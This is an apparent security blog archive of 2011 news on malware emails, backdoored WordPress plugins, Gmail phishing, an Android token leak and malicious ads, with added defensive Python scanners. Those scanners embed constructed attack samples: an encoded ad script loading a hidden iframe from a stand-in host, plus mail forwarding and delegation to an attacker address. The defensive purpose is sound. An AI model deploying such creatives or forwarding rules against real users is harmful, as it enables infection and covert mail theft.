From the category archives:

Security Tips

McDonald's Meal Malware

I don’t know if you’re the sort of person who wakes up in the morning and the first thing you long for is a McDonald's breakfast, but if you are, you might be exactly what malware authors are looking for.

Researchers at SophosLabs have seen a malicious email that has been spammed out across the world in the last couple of days pretending to come from McDonalds.

The email claims that the fast-food giant is offering free breakfasts in every one of its many thousands of restaurants around the globe. Chances are there are plenty of people who would love the prospect of munching on a McDonald's first thing in the morning.

McMalware Email

Part of the email reads as follows:

McDonalds invites you to The Free Breakfast Day which will take place on 26 June, 2011, in every cafe of ours.

Free Day’s menu!
- Ranch Snack Wrap (Crispy)
- Chicken Selects Premium Breast Strips
- Premium Caesar Salad with Grilled Chicken
- Strawberry Triple Thick Shake
- McCafe Hot Chocolate

Print the invitation card attached to the letter and show it at the cash desk of any of our restaurants.

But beware! There is no such thing as a free lunch… or breakfast.

The attached file is, of course, malicious. Sophos detects the ZIP file as Troj/BredoZp-DV and the Invitation_Card.exe file contained within as the Troj/Bredo-HU Trojan horse.

In an attempt to fool computer users into believing the file is safe, the EXE file has a Word icon.

Don’t forget – you should always be suspicious of unsolicited attachments sent to you via email!
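The lure above works because the icon and the name say "document" while the content says "program". The following Python script is an added example (not from Sophos or the original post) of the check a mail gateway or a cautious recipient can run on a ZIP attachment: it ignores the icon entirely and looks at the extension, at double extensions such as Invitation_Card.doc.scr, and at the first bytes of each member, since a Windows executable starts with the "MZ" DOS stub whatever it is called. The ZIP and its contents are constructed inline so the script runs offline; the real attachment's bytes are not reproduced here.

```python
from __future__ import annotations

import io
import zipfile

# Extensions Windows will run directly; a Word icon is cosmetic and says
# nothing about what the file actually is.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Extensions users read as "a document"; paired with an executable extension
# they indicate a double-extension lure (Invitation_Card.doc.exe).
DOCUMENT_EXTENSIONS = {".doc", ".docx", ".pdf", ".txt", ".jpg", ".png"}


def classify_member(name: str, head: bytes) -> list[str]:
    """Return the reasons a ZIP member looks like an executable lure (empty if none)."""
    reasons = []
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE_EXTENSIONS:
        reasons.append(f"executable extension {ext}")
    if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTENSIONS and ext in EXECUTABLE_EXTENSIONS:
        reasons.append("double extension disguised as a document")
    # PE files start with the DOS stub magic "MZ" regardless of name or icon.
    if head[:2] == b"MZ":
        reasons.append("PE header (MZ) in content")
        if ext not in EXECUTABLE_EXTENSIONS:
            reasons.append(f"PE content behind non-executable extension {ext or '(none)'}")
    return reasons


def scan_zip_attachment(data: bytes) -> dict[str, list[str]]:
    """Map each suspicious member name to its findings; an empty dict means nothing was flagged."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(64)  # only the magic bytes are needed
            reasons = classify_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_attachment() -> bytes:
    """Constructed sample: a ZIP shaped like the one in the spam run, plus a benign file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invitation_Card.exe", b"MZ\x90\x00" + b"\x00" * 60)      # fake PE stub
        zf.writestr("Invitation_Card.doc.scr", b"MZ\x90\x00" + b"\x00" * 60)  # double extension
        zf.writestr("menu.txt", b"Ranch Snack Wrap\nMcCafe Hot Chocolate\n")  # harmless
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip_attachment(build_sample_attachment()).items():
        print(member, "->", "; ".join(reasons))
```

The content check matters more than the name check: renaming Invitation_Card.exe to Invitation_Card.pdf would slip past an extension filter but still shows the MZ header, and a gateway that unpacks archives can apply the same test one level down.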

http://nakedsecurity.sophos.com/2011/06/21/free-breakfast-day-mcdonalds-malware/


WordPress Security

Attackers added a back door to three plug-ins that were available for download from WordPress for more than 24 hours.

WordPress on Tuesday warned all users who run its software on their own servers to beware of a trio of malicious plug-ins for its content management software, which may have been available for download from the site for more than 24 hours.

“Earlier today the WordPress team noticed suspicious commits to several popular plugins–AddThis, WPtouch, and W3 Total Cache–containing cleverly disguised backdoors. We determined the commits were not from the authors, rolled them back, pushed updates to the plugins, and shut down access to the plugin repository while we looked for anything else unsavory,” said a warning from Matt Mullenweg, founding developer of WordPress, released on Tuesday.

Plug-ins extend WordPress functionality, and the ones called out in the security warning offer an interface with social networking sites (AddThis), mobile and iPad versions of WordPress blogs (WPtouch), and server performance enhancements (W3 Total Cache). AddThis and W3 Total Cache have been downloaded at least 500,000 times, and the free version of WPtouch, more than two million times.

Mullenweg said that while an investigation is underway and there’s no evidence that attackers compromised the WordPress site, WordPress just to be safe has forcibly reset all passwords for WordPress.org, which is the site where users can download WordPress. “To use the forums, [development site] Trac, or commit to a plugin or theme, you’ll need to reset your password to a new one”–by using the log-in page–said Mullenweg.


In addition, he said that any users of the three Trojanized plug-ins who updated them “in the past day” (meaning Monday or Tuesday) should upgrade those plug-ins immediately.

Plug-ins, malicious or otherwise, continue to account for an increasing number of vulnerabilities seen in applications, both on PCs (for example, with browsers) and in Web applications (such as WordPress). In terms of WordPress, plug-ins now account for 80% of all WordPress-related vulnerabilities, according to HP DVLabs.

But some plug-in vulnerabilities are worse than others. “Web-based backdoors can be extremely dangerous,” said Paul Ducklin, head of technology for Sophos in the Asia Pacific region, in a blog post. “If you’re a WordPress user, you’ll know that the WordPress platform includes a complete and powerful administration interface, password-protected, via a URL such as ‘site.example/wp-admin’. A WordPress backdoor might offer something with similar functionality, but using a different, unexpected, URL, and using a password known to the hacker, instead of to you.”

Another danger is that if attackers managed to steal WordPress passwords, they might attempt to use them to access other sites. According to Mullenweg, “as a user, make sure to never use the same password for two different services, and we encourage you not to reset your password to be the same as your old one.”

Unfortunately, password reuse remains rampant as numerous, recent attacks have shown, such as when LulzSec released stolen databases containing usernames and passwords–such as the release of 37,608 SonyPictures.com passwords, which researchers have cross-referenced with other leaked databases.

http://www.informationweek.com/news/security/vulnerabilities/231000230


The Best Antivirus Software in 2011

Antivirus vendors have included “2011” in their product names since the summer of 2010. Now that the year 2011 has actually arrived it’s time for a new look at the whole collection. Several of the latest additions attempt to crank up protection by running two different antivirus engines, and some actually succeed. This batch also brings a new Editors’ Choice for free antivirus and a new shared Editors’ Choice for commercial antivirus.

As always, when I say “antivirus” I mean a utility that protects against all kinds of malicious software, not just viruses. Trojans, spyware, rootkits, keyloggers, adware, scareware – a proper antivirus must handle all of these.

Standalone or Suite?
Many of this year’s products blur the line between standalone antivirus and security suite. In the past the presence of a personal firewall has been one defining suite element; not any more. There’s a fully-functional firewall inside Panda Antivirus Pro 2011. eScan Anti-Virus 11 and McAfee AntiVirus Plus 2011 also offer firewall protection. Norton AntiVirus 2011 doesn’t include a complete firewall, but its intrusion prevention feature is more effective against exploits than most full-blown suites.

Spam filtering is another component typically found in a suite. The spam filter built into BullGuard Antivirus 10 is reasonably accurate and unusually helpful at setup time. eScan also offers a spam filter, but it’s not something you’d want to inflict on your Inbox.

StopSign Internet Security 1.0 includes an optional firewall with spam filtering built in. None of the independent labs have tested it, though, and its performance in my own malware blocking and removal tests was so poor that I didn’t bother evaluating those optional features.

BitDefender Antivirus Pro 2011 offers full remote management of other BitDefender installations across the network. McAfee can monitor other installations remotely and fix problems. Panda and Norton can at least let you know when another installation has problems, though they won’t fix those problems remotely.

BitDefender includes a very effective phishing prevention tool, as does G Data AntiVirus 2011. The LinkScanner component in AVG Anti-Virus Free 2011 also works to block phishing sites, as does McAfee’s SiteAdvisor. AVG and Norton both scan the links on your Facebook pages to protect you from Facebook scams and viruses. BitDefender and Kaspersky Anti-Virus 2011 both check your system for security vulnerabilities, though BitDefender takes the concept a bit farther.

Outpost Antivirus Pro 7.0 and BitDefender can block transmission of user-defined private data, a feature usually found only in suites. Ad-Aware Pro Internet Security 9.0, AVG, Kaspersky, and McAfee will tune system performance and wipe out traces of computer and Internet use. Sometimes it’s hard to remember that the product is “only” an antivirus, not a full suite.

The true standalone antivirus isn’t dead, however. For example, F-Secure Anti-Virus 2011 sticks to the business of virus protection without any sign of morphing into a mini-suite.

Twin-Engine Trend
Several late-season additions aim to double your protection by using two antivirus engines, with varying degrees of success. G Data’s dual scan doesn’t take much longer than the average single-engine product, and it includes powerful phishing protection. However, it doesn’t thoroughly clean up the threats it detects, and a failed cleanup effectively killed one test system. TrustPort Antivirus 2011 ran a bit slower than G Data and failed significantly in my testing. After its alleged removal some threats were still running. In the malware blocking test a few threats that it claimed to block managed to install and launch anyway.

Double Anti-Spy Professional v2 turned in the best performance of the twin-engine antivirus tools. It scans first with one engine, then with the other, and it also requires two separate updates. It’s noticeably slow, but effective enough that it’s worth waiting for.

Adjustable Interfaces, Built-in Support
Some users want to hear about every little security event, but most prefer a product that just does the job, without making a fuss. Ad-Aware Pro appeals to both with a choice of simple or advanced mode. BitDefender goes even further. Not only can its users choose basic, intermediate or expert view, they can build a personal collection of their most-used tools.

Webroot AntiVirus with Spy Sweeper 2011 totally focuses on keeping everything as simple as possible. It updates automatically, scans while the system is idle, and interacts with the user through a completely redesigned interface. All the detail a tech-savvy user might want is available, but hidden when not needed.

The user interface for Trend Micro Titanium Antivirus + 2011 discards the standard landscape-orientation window for a skinny vertical panel that takes up minimal space. McAfee, too, has switched to a vertical interface.

Norton reserves a panel across the bottom of its main window for interaction and communication with other security components. Initially the panel shows an interactive world map of security activity, but it can also connect with Norton Safe Web for Facebook or with your Norton Online Backup account.

Built-in and automated support features grace many of these tools. BitDefender includes a search box for help topics right on its main screen; a built-in tool will gather system information and contact an agent for chat-based support. Norton’s one-click support system gathers diagnostics and offers relevant FAQs or chat-based support. Kaspersky’s built-in support tool can send diagnostic reports to the company and process purpose-built scripts to fix specific problems. Panda’s PSCAN lets remote analysts request samples and push fixes without requiring full chat-type interaction. BullGuard offers built-in access to e-mail and live chat support with a message center to manage your support interactions. eScan links to live chat and online help.



Top Ten Security Threats - 2011

Imperva announced their predictions for the top ten security trends for 2011 which have been compiled to help IT security professionals defend their organization against the next onslaught of cyber security threats.

The trends have been detailed below:

1. Nation-sponsored hacking: When APT meets industrialization
Nation-sponsored, specifically targeted cyber attacks will incorporate concepts and techniques from the commercial hacker industry. These campaigns will carry a different malware payload from traditional attacks conducted for monetary gain, but they will use similar techniques. Advanced Persistent Threat (APT) attacks will borrow techniques such as automation and viral distribution, making them more powerful and potentially more successful. An example of such an attack is Stuxnet, which was not searching for data to monetize but was focused on gaining control of critical infrastructure.

Both classes of attack (the hacker industry and APT) are going to use some of the same techniques, so some security controls are applicable to both. On the positive side, if you are covered against the cyber mafia you should already have some of the controls needed to protect against certain APT attacks. Because an APT is persistent, if one attack does not succeed another will follow. Traditional security controls do not deter these relentless, state-sponsored hacker organizations. For enterprises as well as government, this means increased monitoring of traffic and security controls across all layers of the organization.


2. The insider threat is much more than you had imagined
In the coming year we expect to see growing awareness of security incidents of an “inside job” nature. Attention will grow as a consequence of an increased flow of incident reports in which data theft and security breaches are tied to employees and other insiders. The cause of this trend will be the emphasis that new regulations put on notification and disclosure (rather than on the actual protection of data).

To deter insider threats, organizations should therefore:

  • Enforce access controls such that access is granted only on a business need-to-know basis. This includes eliminating excessive privileges.
  • Provide proper access-auditing tools for data centers, so that it is possible to monitor who accesses what data.

3. Man in the Browser attacks will man up
Man in the Browser (MitB) attacks are going to increase in sophistication and spread to more types of online applications. As a consequence, more online service providers are going to put MitB on their list of priorities for 2011, shifting the responsibility for mitigating the risk from consumers to service providers.

While avoiding infection by proxy Trojans is presumably the consumer's responsibility, MitB attacks are quickly becoming a concern for online service providers. The actual rate of infection and the proliferation of MitB malware families mean that providers must be able to serve (and protect) customers who may be infected with one kind of malware or another. Just as the evolution of vehicle safety drove manufacturers to include devices such as ABS, airbags and ESP rather than rely on us to drive carefully, online service providers will need to invest in mechanisms that let them conduct business with possibly infected consumers. Among the technologies we foresee as helpful are strong device identification, client profiling, fast security-code evolution, session-flow tracking and site-to-client authentication.



Amazon Web Services used to spread malware

A Kaspersky researcher spies some malware hosted on AWS targeting bank data.

Cyber criminals have used Amazon Web Services (AWS) accounts to spread financial data-stealing malware, a security researcher has discovered.

The malware, hosted on AWS, appeared to have emanated from Brazil, as banks within the country were targeted, said Kaspersky Lab expert Dmitry Bestuzhev.

“The evidence indicates that the criminals behind the attack are from Brazil and they used several previously registered accounts to launch the infection,” Bestuzhev said in a blog post.

The malware spotted on AWS was able to do a variety of nasty things. As a rootkit, it attempted to disable four different anti-virus programs and a special security application used by Brazilian financial institutions for online banking.

It also attempted to steal financial data from nine Brazilian and two international banks, as well as acquire Microsoft Live Messenger credentials.

At the time of publication, Amazon had not confirmed whether the accounts used to spread the malware had been deactivated.

The findings came after some reports indicated hackers who hit Sony in April had used AWS as a platform.

Last month, Citrix chief technology officer (CTO) Simon Crosby claimed the public cloud was a safer place to store data than the private cloud.

The public cloud may also be a safer place for cyber criminals to operate, however.

“I believe legitimate cloud services will continue to be used by criminals for different kinds of cyber-attacks,” Bestuzhev added.

“Cloud providers should start thinking about better monitoring systems and expanding security teams in order to cut down on malware attacks enabled and launched from their cloud.”

Criminals benefit from using well-known cloud services: a server with a good reputation is less likely to be blocked by web filters, so malware hosted there reaches more victims.

From http://www.itpro.co.uk/634021/aws-used-to-spread-bank-data-malware


Google Gmail Hacked

An attack from China has affected hundreds of users, including senior U.S. government officials, Chinese political activists, officials in several Asian countries such as South Korea, military personnel, and journalists.

Google has detected a campaign to gather Gmail account credentials that appears to originate from Jinan, China, and is warning users to take a few minutes to review their security settings.

Eric Grosse, engineering director for Google’s security team, said in a blog post that hundreds of users have been affected, including senior U.S. government officials, Chinese political activists, officials in several Asian countries such as South Korea, military personnel, and journalists.

“The goal of this effort seems to have been to monitor the contents of these users’ emails, with the perpetrators apparently using stolen passwords to change peoples’ forwarding and delegation settings,” Grosse said.

By changing these settings, which are only evident through the appropriate Gmail Settings tab page, the attackers could generate copies of incoming and outgoing email that would be forwarded without the account holder’s knowledge.

Google declined to provide further details or information about those it believes may be behind the attack.

In January 2010, Google reported that it had uncovered “a highly sophisticated and targeted attack on our corporate infrastructure originating from China.” Google said at the time that it had reason to believe that one of the main goals of the attackers was to compromise the Gmail accounts of Chinese human rights activists.

In that respect, the attack was not very successful: While Google acknowledged that the attackers had stolen unspecified intellectual property, it stressed that only two Gmail accounts appeared to have been accessed.

Jinan, capital of Shandong Province in Eastern China, happens to be the location of the Lanxiang Vocational School, one of the two Chinese schools linked to the 2010 attack against Google.

An October 2009 report on Chinese cyber espionage prepared by defense contractor Northrop Grumman said that the Chinese military maintains at least six technical reconnaissance bureaus for gathering cyber intelligence in the Lanzhou, Jinan, Chengdu, Guangzhou, and Beijing military regions.

The current attack differs from the 2010 attack in that it doesn’t involve a vulnerability in Google’s infrastructure; it is simply a phishing campaign to dupe users into revealing their Gmail login credentials.


Google said that it detected the phishing campaign through its cloud-based security and abuse detection systems, through the reports from users, and through a report published in February on the Contagio blog, a collection of malware samples and threat analysis. The company said it has notified victims and the relevant government authorities.

Google is advising Gmail users to consider steps to improve the security of their accounts. The company recommends using two-factor verification, using a strong password, only entering account information at the proper Google domain, checking Gmail settings for unknown forwarding addresses or unauthorized account delegation, watching for suspicious account activity warnings, using Google Chrome, and reviewing security education materials available online.
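Because the attackers' changes were made through ordinary settings, the account looks healthy until someone reads those settings. Checking them by hand works for one mailbox; for a fleet, or for a recurring check, you want it scripted. The Python below is an added example, not Google's code. It assumes the JSON shapes returned by the Gmail API's users.settings resources (getAutoForwarding, forwardingAddresses.list, delegates.list and filters.list) as documented publicly, and takes those responses as input so it runs offline; the sample responses, addresses and allowlists are constructed here. It goes one step beyond the article by also flagging filters with a forward action, which achieve the same silent copying as account-wide forwarding.

```python
from __future__ import annotations

# Addresses the mailbox owner has knowingly approved; anything else is a finding.
APPROVED_FORWARDING = {"backup@example.com"}
APPROVED_DELEGATES = {"assistant@example.com"}

# Constructed sample responses, shaped like the Gmail API users.settings
# resources. Every address and id here is invented for this example.
SAMPLE_SETTINGS = {
    "autoForwarding": {"enabled": True, "emailAddress": "collector@attacker.example",
                       "disposition": "leaveInInbox"},
    "forwardingAddresses": {"forwardingAddresses": [
        {"forwardingEmail": "backup@example.com", "verificationStatus": "accepted"},
        {"forwardingEmail": "collector@attacker.example", "verificationStatus": "accepted"},
    ]},
    "delegates": {"delegates": [
        {"delegateEmail": "assistant@example.com", "verificationStatus": "accepted"},
        {"delegateEmail": "reader@attacker.example", "verificationStatus": "accepted"},
    ]},
    "filters": {"filter": [
        {"id": "f1", "criteria": {"from": "newsletter@example.org"},
         "action": {"removeLabelIds": ["INBOX"]}},
        {"id": "f2", "criteria": {"query": "*"},
         "action": {"forward": "collector@attacker.example", "removeLabelIds": ["UNREAD"]}},
    ]},
}


def audit_gmail_settings(settings: dict, approved_forwarding: set, approved_delegates: set) -> list[str]:
    """Return one human-readable finding per setting that could leak mail to a third party."""
    findings = []

    # Account-wide forwarding of everything that arrives.
    auto = settings.get("autoForwarding", {})
    if auto.get("enabled") and auto.get("emailAddress") not in approved_forwarding:
        findings.append(f"auto-forwarding enabled to unapproved address {auto.get('emailAddress')}")

    # Verified forwarding addresses are a prerequisite for forwarding; an unknown one
    # is a finding even if forwarding is currently switched off.
    for entry in settings.get("forwardingAddresses", {}).get("forwardingAddresses", []):
        addr = entry.get("forwardingEmail")
        if addr not in approved_forwarding:
            findings.append(f"unknown forwarding address {addr} ({entry.get('verificationStatus')})")

    # A delegate reads and sends as the owner without needing the password again.
    for entry in settings.get("delegates", {}).get("delegates", []):
        addr = entry.get("delegateEmail")
        if addr not in approved_delegates:
            findings.append(f"unknown delegate {addr} ({entry.get('verificationStatus')})")

    # Filters can forward selectively and are easy to overlook in the settings UI.
    for flt in settings.get("filters", {}).get("filter", []):
        target = flt.get("action", {}).get("forward")
        if target and target not in approved_forwarding:
            findings.append(f"filter {flt.get('id')} forwards matching mail to {target}")

    return findings


if __name__ == "__main__":
    for line in audit_gmail_settings(SAMPLE_SETTINGS, APPROVED_FORWARDING, APPROVED_DELEGATES):
        print("FINDING:", line)
```

Run against live data, the same function takes the four API responses in place of SAMPLE_SETTINGS. A stolen password is also enough to add a delegate, so resetting the password without removing the delegate leaves the attacker in.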


ZDNet's Scareware Guide

Attackers increasingly focused on fake antivirus and black-hat SEO techniques to target victims on the Web in April.

The volume of malware continued to increase in April as online scammers and malware distributors took advantage of major events according to security experts. Fake antivirus software and poisoned image search links were particularly prevalent in April.

There were over 73,000 new variants of malware released daily in April, a 26 percent increase over April 2010, GFI Software found in its monthly analysis released May 16. Cyber-criminals exploited several high-profile events, including the U.K. Royal Wedding of Prince William and Kate Middleton, the Easter holiday, the anniversary of Yuri Gagarin becoming the first man in space and the release of President Barack Obama’s birth certificate.

Seven of the top 10 malware threats were Trojans, according to GFI’s top 10 malware list for the month. Trojan.Win32.Generic!BT, a generic malware classification that encompasses a variety of Trojans, continued to be the biggest threat, accounting for over 20 percent of total malware detected. The Zeus/SpyEye Trojan and fake antivirus were also part of the top 10.


Google Android Security

Google is rolling out a security patch for Android that fixes a vulnerability reported to have affected 99 per cent of users.

The patch fixes an issue flagged by German security experts that could allow hackers to look at personal information in the Google calendar and contacts apps.

The University of Ulm researchers said that in Android 2.3.3 and earlier these apps transmitted unencrypted information to retrieve an authentication token, or Authtoken, from Google. This left an opening where criminals could steal the token through WiFi snooping.

Once a hacker had one of these Authtokens, they could use it for several days, accessing your private information and potentially impersonating an individual smartphone. In Android 2.3.4 this flaw is fixed, but it was mentioned that 99 per cent of Android users were still using versions 2.3.3 and earlier, which meant they were all at risk.

But now Google is updating all of the endangered handsets with a silent server-side patch that won’t require any action by Android users, forcing servers to use an encrypted HTTPS connection when syncing with a handset.
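The flaw is a bearer token travelling in the clear: whoever sees the HTTP request on the Wi-Fi has the token, and the fix is simply to stop sending it over plaintext. The Python below is an added example, not code from Google or the Ulm researchers, of the check a network defender can run over captured traffic to find credentials exposed this way. It assumes the ClientLogin header format ("Authorization: GoogleLogin auth=<token>") and treats a captured flow as a (host, port, payload) triple; the three flows, the token and the User-Agent string are constructed here, and the token is reported only as a truncated hash so the finding itself does not leak it.

```python
from __future__ import annotations

import hashlib

# Header schemes whose value is a reusable credential.
AUTH_SCHEMES = ("GoogleLogin", "Bearer", "Basic")


def parse_http_request(payload: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers); None if the bytes are not HTTP."""
    try:
        head, _, _ = payload.partition(b"\r\n\r\n")
        lines = head.decode("iso-8859-1").split("\r\n")
        method, path, version = lines[0].split(" ", 2)
    except ValueError:
        return None
    if not version.startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def find_cleartext_tokens(flows) -> list[dict]:
    """flows: iterable of (dst_host, dst_port, payload). One finding per credential sent in the clear."""
    findings = []
    for host, port, payload in flows:
        if port == 443:
            continue  # TLS: a passive sniffer sees ciphertext, there is nothing to parse
        req = parse_http_request(payload)
        if req is None:
            continue
        method, path, headers = req
        auth = headers.get("authorization", "")
        scheme = auth.split(" ", 1)[0] if auth else ""
        if scheme in AUTH_SCHEMES:
            # GoogleLogin carries "auth=<token>"; the others carry the token directly.
            token = auth.split("=", 1)[-1] if scheme == "GoogleLogin" else auth.split(" ", 1)[-1]
            fingerprint = hashlib.sha256(token.encode()).hexdigest()[:12]
            findings.append({"host": host, "port": port, "method": method, "path": path,
                             "scheme": scheme, "token_fingerprint": fingerprint})
    return findings


# Constructed sample capture: a calendar sync in the style of Android 2.3.3 over
# HTTP, the same sync after the fix (HTTPS; only opaque TLS bytes are visible),
# and unrelated traffic without credentials.
SAMPLE_FLOWS = [
    ("www.google.com", 80,
     b"GET /calendar/feeds/default/private/full HTTP/1.1\r\n"
     b"Host: www.google.com\r\n"
     b"Authorization: GoogleLogin auth=DQAAAJconstructedtoken0000\r\n"
     b"User-Agent: Android-GData/1.2 (constructed)\r\n\r\n"),
    ("www.google.com", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03\x8b\x1e\x9c"),
    ("example.com", 80, b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
]


if __name__ == "__main__":
    for f in find_cleartext_tokens(SAMPLE_FLOWS):
        print(f"{f['scheme']} token to {f['host']}:{f['port']} {f['path']} (sha256 {f['token_fingerprint']})")
```

Any token that shows up here is already compromised as far as you can tell, and since these tokens were valid for days, forcing a new one matters as much as closing the hole: Google's server-side switch to HTTPS stops the leak but does not expire tokens already captured.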

A Google spokesperson said, “We’re starting to roll out a fix which addresses a potential security flaw that could, under certain circumstances, allow a third party access to data available in calendar and contacts. This fix requires no action from users and will roll out globally over the next few days.”

Sophos security consultant Graham Cluley praised Google’s actions but added, “Concerns still remain as to how easy it would be to fix a serious security vulnerability on the Android devices themselves, given that Google is so reliant on manufacturers and carriers to push out OS updates.”

from The Inquirer http://www.theinquirer.net


GFI Software has announced the top 10 most prevalent malware threats for February 2011, as detected by scans performed by its anti-malware product, VIPRE Antivirus, and its anti-spyware tool, CounterSpy.

A trend observed since last summer continued, with many of the same types of Trojan horses dominating the threat landscape. Trojans held six of the ten places in the list below. Topping it, detections classified as Trojan.Win32.Generic!BT accounted for 22.97 percent of all detections, holding the number one spot.

These Trojans are downloaders associated with rogue security programs known as fake antivirus software, sometimes called “scareware”. Once on a user's system, these programs perform a fake scan of the victim's computer for malware and then display false warnings that the machine is infected, in an attempt to persuade the victim to buy the fake security software.

The top 10 results represent the number of times a specific malware infection was detected in the course of VIPRE and CounterSpy scans that report back to GFI's community of opt-in users. Threats are classified as moderate to extreme based on the method of installation, among other criteria established by GFI Labs.

Top 10 Detections for February 2011 as reported by GFI Software:

Rank  Detection                                 Type          Share of detections
1     Trojan.Win32.Generic!BT                   Trojan        22.97%
2     Trojan-Spy.Win32.Zbot.gen                 Trojan         3.46%
3     Trojan.Win32.Generic.pak!cobra            Trojan         2.89%
4     Zugo LTD (v)                              Adware         2.52%
5     Fraudtool.Win32.Securityshield.ek!c (v)   Trojan         2.00%
6     Trojan.Win32.Generic!SB.0                 Trojan         1.72%
7     INF.Autorun (v)                           Trojan         1.66%
8     Worm.Win32.Downad.Gen (v)                 Worm           1.48%
9     Pinball Corporation (v)                   Adware         1.19%
10    Exploit.PDF-JS.Gen (v)                    PDF exploit    0.83%


Infected Search?

Antivirus company Avast alleges that ads served by companies such as Google, Yahoo! and Fox, and published on websites such as the New York Times and TechCrunch, have included bad software that could infect your computer.

Users don’t even have to click the ads to be affected. Their browser gets infected just from loading the ads. CNet has the story.

The report alleges that these companies’ ad platforms served ads carrying a JavaScript exploit that Avast detects as JS:Prontexi.

Prontexi is a Trojan horse targeting Windows machines that looks for further vulnerabilities in software such as Adobe’s Reader and Acrobat, Java, QuickTime and Flash. It pops up fake antivirus warnings to trick you into installing further malware. The malware started spreading in late December. Since then, Avast has found it has infected more than 2.6 million computers. Almost 530,000 of those were from Yield Manager and more than 16,300 from DoubleClick.

The worst affected are Yahoo!’s Yield Manager, Fox Audience Network’s Firmserve.com and Google’s DoubleClick. Together, these networks serve over 50% of all internet ads. DoubleClick has been the least affected and Google has been the fastest at tackling the problem, according to CNet and Avast.

A Yahoo representative confirmed the report and said it was investigating the situation, but didn’t provide much information. “We have identified the creatives in question and are working to make sure they have been deactivated in our system,” the company said in a statement.

“Yahoo is deeply committed to providing a high-quality experience for users, advertisers, and publishers. We expect our members to support and abide by our standards and guidelines around acceptable ad content and behavior,” the statement said. “On the rare occasion that an ad is served that is in conflict with our expectations and guidelines we take action to remove it as quickly as possible.”

A Google spokesman said the company had discovered malware in ads from DoubleClick on its own and halted them. “In this case, we stopped several of the ads in question on the same day, independent of this report,” he said.
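What makes a creative like this dangerous is that it runs on load, and what makes it hard to catch is that the part that does the work (a hidden frame pulling in the exploit page, a probe of which plug-ins are installed, the fake warning) is usually wrapped in a layer or two of unescape() or String.fromCharCode() so a reviewer skimming the tag sees nothing. The Python below is an added example, not Avast's, CNet's or any ad network's code, and not the actual JS:Prontexi sample, which the article does not reproduce. It folds those two encoders statically, then checks the decoded text for the behaviours described above (hidden iframe, plug-in enumeration, the plug-in names the report lists, and scareware wording); the two creatives are constructed here.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
_UNESCAPE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def js_unescape(s: str) -> str:
    """JavaScript's unescape(): %uXXXX for UTF-16 units, then ordinary %XX."""
    return unquote(_PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), s))


def deobfuscate(script: str, max_rounds: int = 5) -> str:
    """Statically fold String.fromCharCode(...) and unescape('...') until a round changes nothing.
    Decoded strings are re-inserted as single-quoted literals so nested layers unwrap too."""
    for _ in range(max_rounds):
        before = script
        script = _FROMCHARCODE.sub(
            lambda m: "'" + "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()) + "'",
            script)
        script = _UNESCAPE.sub(lambda m: "'" + js_unescape(m.group(2)) + "'", script)
        if script == before:
            break
    return script


# Behaviours worth a human look once the creative is decoded. None of these is
# proof on its own; together they describe the drive-by pattern in the article.
INDICATORS = [
    ("hidden iframe", re.compile(
        r"<iframe[^>]*(width\s*=\s*['\"]?0\b|height\s*=\s*['\"]?0\b|visibility\s*:\s*hidden|display\s*:\s*none)", re.I)),
    ("plugin enumeration", re.compile(r"navigator\.plugins|new\s+ActiveXObject\s*\(", re.I)),
    ("targets plugins named in the report", re.compile(r"Adobe Acrobat|Adobe Reader|Shockwave Flash|QuickTime|\bJava\b")),
    ("fake antivirus lure", re.compile(r"your computer is infected|virus(es)? (found|detected)|security (scan|alert)", re.I)),
]


def analyze_creative(html: str) -> list[str]:
    decoded = deobfuscate(html)
    return [label for label, rx in INDICATORS if rx.search(decoded)]


# Constructed sample creative: the frame and the plug-in probe are encoded,
# the scareware message is not.
SAMPLE_CREATIVE = (
    "<script>\n"
    "var a=unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fad-srv.example%2Fx.php%22"
    "%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E');\n"
    "document.write(a);\n"
    "var p=String.fromCharCode(110,97,118,105,103,97,116,111,114,46,112,108,117,103,105,110,115);\n"
    "if(eval(p)['Shockwave Flash']){alert('Your computer is infected!');}\n"
    "</script>\n"
)
# Constructed benign creative for comparison.
BENIGN_CREATIVE = "<a href='http://shop.example/sale'><img src='banner.png' width=300 height=250></a>"


if __name__ == "__main__":
    print("sample  :", analyze_creative(SAMPLE_CREATIVE))
    print("benign  :", analyze_creative(BENIGN_CREATIVE))
```

Static folding handles the common encoders but not arbitrary JavaScript; a creative that builds its payload with arithmetic or fetches it from a second host needs to be run in an instrumented browser. Even so, a decoded navigator.plugins lookup or a zero-size frame in something sold as a banner is enough reason to hold the creative before it goes live.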
